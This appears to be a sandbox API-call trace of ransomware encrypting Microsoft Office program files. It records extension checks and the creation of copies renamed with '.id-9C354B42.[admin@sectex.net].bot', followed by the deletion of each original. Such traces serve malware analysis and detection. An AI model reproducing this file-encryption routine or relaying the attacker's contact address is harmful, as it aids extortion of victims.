	[0145.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.800] lstrlenW (lpString=".dbf") returned 4
	[0145.800] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0145.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.800] lstrlenW (lpString=".1cd") returned 4
	[0145.801] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0145.801] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT") returned 61
	[0145.801] lstrlenW (lpString=".jpg") returned 4
	[0145.801] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0145.801] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0145.801] lstrlenW (lpString="GRAPH_F_COL.HXK") returned 15
	[0145.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.801] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0145.801] CloseHandle (hObject=0x31c) returned 1
	[0145.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk")) returned 0x20
	[0145.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.802] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.802] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.802] GetLastError () returned 0x0
	[0145.802] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0145.803] WriteFile (in: hFile=0x3c0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0145.804] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.804] WriteFile (in: hFile=0x3c0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0145.804] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.804] CloseHandle (hObject=0x3c0) returned 1
	[0145.804] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.805] SetEndOfFile (hFile=0x31c) returned 1
	[0145.808] CloseHandle (hObject=0x31c) returned 1
	[0145.808] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.809] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_f_col.hxk")) returned 1
	[0145.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.809] lstrlenW (lpString=".doc") returned 4
	[0145.809] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0145.809] lstrlenW (lpString=".docx") returned 5
	[0145.809] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0145.809] lstrlenW (lpString=".pdf") returned 4
	[0145.809] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0145.809] lstrlenW (lpString=".xls") returned 4
	[0145.809] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0145.809] lstrlenW (lpString=".xlsx") returned 5
	[0145.809] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0145.809] lstrlenW (lpString=".ppt") returned 4
	[0145.809] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0145.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.810] lstrlenW (lpString=".zip") returned 4
	[0145.810] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0145.810] lstrlenW (lpString=".rar") returned 4
	[0145.810] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0145.810] lstrlenW (lpString=".bz2") returned 4
	[0145.810] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0145.810] lstrlenW (lpString=".7z") returned 3
	[0145.810] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0145.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.810] lstrlenW (lpString=".dbf") returned 4
	[0145.810] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0145.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.810] lstrlenW (lpString=".1cd") returned 4
	[0145.810] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0145.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.810] lstrlenW (lpString=".jpg") returned 4
	[0145.810] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0145.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.810] lstrlenW (lpString=".doc") returned 4
	[0145.810] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0145.810] lstrlenW (lpString=".docx") returned 5
	[0145.810] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0145.810] lstrlenW (lpString=".pdf") returned 4
	[0145.810] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0145.810] lstrlenW (lpString=".xls") returned 4
	[0145.810] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0145.810] lstrlenW (lpString=".xlsx") returned 5
	[0145.810] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0145.810] lstrlenW (lpString=".ppt") returned 4
	[0145.810] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0145.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.811] lstrlenW (lpString=".zip") returned 4
	[0145.811] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0145.811] lstrlenW (lpString=".rar") returned 4
	[0145.811] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0145.811] lstrlenW (lpString=".bz2") returned 4
	[0145.811] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0145.811] lstrlenW (lpString=".7z") returned 3
	[0145.811] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0145.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.811] lstrlenW (lpString=".dbf") returned 4
	[0145.811] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0145.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.811] lstrlenW (lpString=".1cd") returned 4
	[0145.811] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0145.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_F_COL.HXK") returned 63
	[0145.811] lstrlenW (lpString=".jpg") returned 4
	[0145.811] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0145.811] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0145.811] lstrlenW (lpString="GRAPH_K_COL.HXK") returned 15
	[0145.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.812] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0145.812] CloseHandle (hObject=0x31c) returned 1
	[0145.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk")) returned 0x20
	[0145.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0145.812] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.812] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.813] GetLastError () returned 0x0
	[0145.813] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0145.814] WriteFile (in: hFile=0x3c0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0145.814] ReadFile (in: hFile=0x31c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.815] WriteFile (in: hFile=0x3c0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0145.815] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.815] CloseHandle (hObject=0x3c0) returned 1
	[0145.815] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.815] SetEndOfFile (hFile=0x31c) returned 1
	[0145.817] CloseHandle (hObject=0x31c) returned 1
	[0145.817] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.817] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_k_col.hxk")) returned 1
	[0145.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.818] lstrlenW (lpString=".doc") returned 4
	[0145.818] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0145.818] lstrlenW (lpString=".docx") returned 5
	[0145.818] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0145.818] lstrlenW (lpString=".pdf") returned 4
	[0145.818] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0145.818] lstrlenW (lpString=".xls") returned 4
	[0145.818] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0145.818] lstrlenW (lpString=".xlsx") returned 5
	[0145.818] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0145.818] lstrlenW (lpString=".ppt") returned 4
	[0145.818] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0145.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.818] lstrlenW (lpString=".zip") returned 4
	[0145.818] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0145.818] lstrlenW (lpString=".rar") returned 4
	[0145.818] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0145.818] lstrlenW (lpString=".bz2") returned 4
	[0145.818] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0145.818] lstrlenW (lpString=".7z") returned 3
	[0145.819] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0145.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.819] lstrlenW (lpString=".dbf") returned 4
	[0145.819] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0145.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.819] lstrlenW (lpString=".1cd") returned 4
	[0145.819] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0145.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.819] lstrlenW (lpString=".jpg") returned 4
	[0145.819] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0145.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.819] lstrlenW (lpString=".doc") returned 4
	[0145.819] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0145.819] lstrlenW (lpString=".docx") returned 5
	[0145.819] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0145.819] lstrlenW (lpString=".pdf") returned 4
	[0145.819] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0145.819] lstrlenW (lpString=".xls") returned 4
	[0145.819] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0145.819] lstrlenW (lpString=".xlsx") returned 5
	[0145.819] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0145.819] lstrlenW (lpString=".ppt") returned 4
	[0145.819] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0145.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.819] lstrlenW (lpString=".zip") returned 4
	[0145.819] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0145.819] lstrlenW (lpString=".rar") returned 4
	[0145.819] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0145.819] lstrlenW (lpString=".bz2") returned 4
	[0145.819] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0145.819] lstrlenW (lpString=".7z") returned 3
	[0145.819] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0145.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.820] lstrlenW (lpString=".dbf") returned 4
	[0145.820] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0145.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.820] lstrlenW (lpString=".1cd") returned 4
	[0145.820] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0145.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_K_COL.HXK") returned 63
	[0145.820] lstrlenW (lpString=".jpg") returned 4
	[0145.820] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0145.820] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0145.820] lstrlenW (lpString="GRINTL32.DLL") returned 12
	[0145.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.824] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=208256) returned 1
	[0145.824] CloseHandle (hObject=0x38c) returned 1
	[0145.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll")) returned 0x20
	[0145.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0145.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.825] lstrlenW (lpString=".doc") returned 4
	[0145.825] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0145.825] lstrlenW (lpString=".docx") returned 5
	[0145.825] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0145.825] lstrlenW (lpString=".pdf") returned 4
	[0145.825] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0145.825] lstrlenW (lpString=".xls") returned 4
	[0145.825] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0145.825] lstrlenW (lpString=".xlsx") returned 5
	[0145.825] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0145.825] lstrlenW (lpString=".ppt") returned 4
	[0145.825] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0145.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.825] lstrlenW (lpString=".zip") returned 4
	[0145.825] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0145.825] lstrlenW (lpString=".rar") returned 4
	[0145.825] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0145.825] lstrlenW (lpString=".bz2") returned 4
	[0145.825] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0145.826] lstrlenW (lpString=".7z") returned 3
	[0145.826] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0145.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.826] lstrlenW (lpString=".dbf") returned 4
	[0145.826] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0145.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.826] lstrlenW (lpString=".1cd") returned 4
	[0145.826] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0145.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.826] lstrlenW (lpString=".jpg") returned 4
	[0145.826] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0145.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.826] lstrlenW (lpString=".doc") returned 4
	[0145.826] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0145.826] lstrlenW (lpString=".docx") returned 5
	[0145.826] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0145.826] lstrlenW (lpString=".pdf") returned 4
	[0145.826] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0145.826] lstrlenW (lpString=".xls") returned 4
	[0145.826] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0145.826] lstrlenW (lpString=".xlsx") returned 5
	[0145.826] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0145.826] lstrlenW (lpString=".ppt") returned 4
	[0145.826] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0145.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.826] lstrlenW (lpString=".zip") returned 4
	[0145.826] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0145.826] lstrlenW (lpString=".rar") returned 4
	[0145.826] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0145.826] lstrlenW (lpString=".bz2") returned 4
	[0145.826] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0145.826] lstrlenW (lpString=".7z") returned 3
	[0145.827] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0145.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.827] lstrlenW (lpString=".dbf") returned 4
	[0145.827] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0145.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.827] lstrlenW (lpString=".1cd") returned 4
	[0145.827] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0145.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60
	[0145.827] lstrlenW (lpString=".jpg") returned 4
	[0145.827] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0145.827] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0145.827] lstrlenW (lpString="GRINTL32.DLL.IDX_DLL") returned 20
	[0145.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.827] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=37760) returned 1
	[0145.827] CloseHandle (hObject=0x38c) returned 1
	[0145.827] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll")) returned 0x20
	[0145.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0145.828] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.828] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grintl32.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0145.829] GetLastError () returned 0x0
